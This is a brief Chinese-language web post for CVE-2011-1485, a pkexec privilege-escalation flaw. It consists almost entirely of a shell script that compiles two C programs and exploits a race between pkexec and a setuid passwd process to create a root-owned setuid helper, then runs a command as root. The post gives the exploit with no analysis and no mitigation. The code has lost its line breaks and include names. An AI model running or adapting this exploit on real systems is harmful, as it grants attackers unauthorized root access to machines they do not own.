# CVE-2011-1485 pkexec特權提升漏洞
==run.sh==
# modified from http://downloads.securityfocus.com/vulnerabilities/exploits/47496.sh # for rdot.org cat > suid.c << _EOF #include#include main(int argc, char *argv[]) { if(argc == 2) { setgid(0); setuid(0); system(argv[1]); } return 0; } _EOF cat > makesuid.c << _EOF #include #include #include #include #include int main(int argc, char **argv) { if (fork() != 0) { int fd; char pid_path[15]; sprintf(pid_path, "/proc/%i", getpid()); close(0); close(1); close(2); fd = inotify_init(); inotify_add_watch(fd, pid_path, IN_ACCESS); read(fd, NULL, 0); execl("/usr/bin/passwd", "/usr/bin/passwd", NULL); } else { execl("/usr/bin/pkexec", "pkexec", argv[1],argv[2],argv[3], NULL); } return 0; } _EOF gcc -o suid suid.c gcc -o makesuid makesuid.c ./makesuid chown root:root $PWD/suid ./makesuid chmod u+s $PWD/suid echo "your suid is on ./suid make sure u move this !!!" rm suid.c makesuid.c makesuid $PWD/suid -c /usr/bin/id
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容